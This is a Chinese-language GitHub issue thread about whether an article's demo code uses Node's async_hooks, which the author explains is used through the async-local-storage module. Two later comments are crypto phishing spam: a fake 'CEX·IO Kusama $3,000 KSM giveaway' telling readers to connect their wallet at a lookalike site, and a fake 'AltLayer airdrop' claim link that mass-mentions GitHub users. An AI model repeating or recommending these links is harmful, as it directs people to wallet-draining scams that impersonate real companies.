### ISSUE TITLE
没有看到对async_hooks的直接使用

### ISSUE THREAD

**Issue by 0x11-dev** [vicanso/articles#5]
你用的是async-local-storage做的存储，之所以数据对完全是没有并发啊！！ 是代码没有更新吗?

**Comment by vicanso** [comment]
@levin-du  没明白你问的是什么？你要测试并发运行`https://github.com/vicanso/articles/tree/master/async-hooks`这个代码，再用 `ab` 或者 `siege` 之类做测试就好了

**Comment by 0x11-dev** [comment]
没有看到使用async_hooks，是我没找到吗

**Comment by vicanso** [comment]
@levin-du  里面用到的 [async-local-storage](https://github.com/vicanso/async-local-storage) 模块有用到async_hooks

**Comment by 0x11-dev** [comment]
我的错，我找到了另一个同名的localstorage库

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by jccalbuquerque** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.
plumenator, @calexei, @damianesteban, @Lifetimeblaze, @michahell, @nrryuya, @yisheng, @gkaemmer, @tangdaniu, @FingerMoney, @TenviLi, @coinevernote, @shanev, @redaready, @dogecrypto, @andrew-atkinson, @PhABC, @ssojic, @WakerD, @Garrett-Benoit

**Comment by WakerD** [comment]
亲，您的邮件已收到，我会尽快处理。
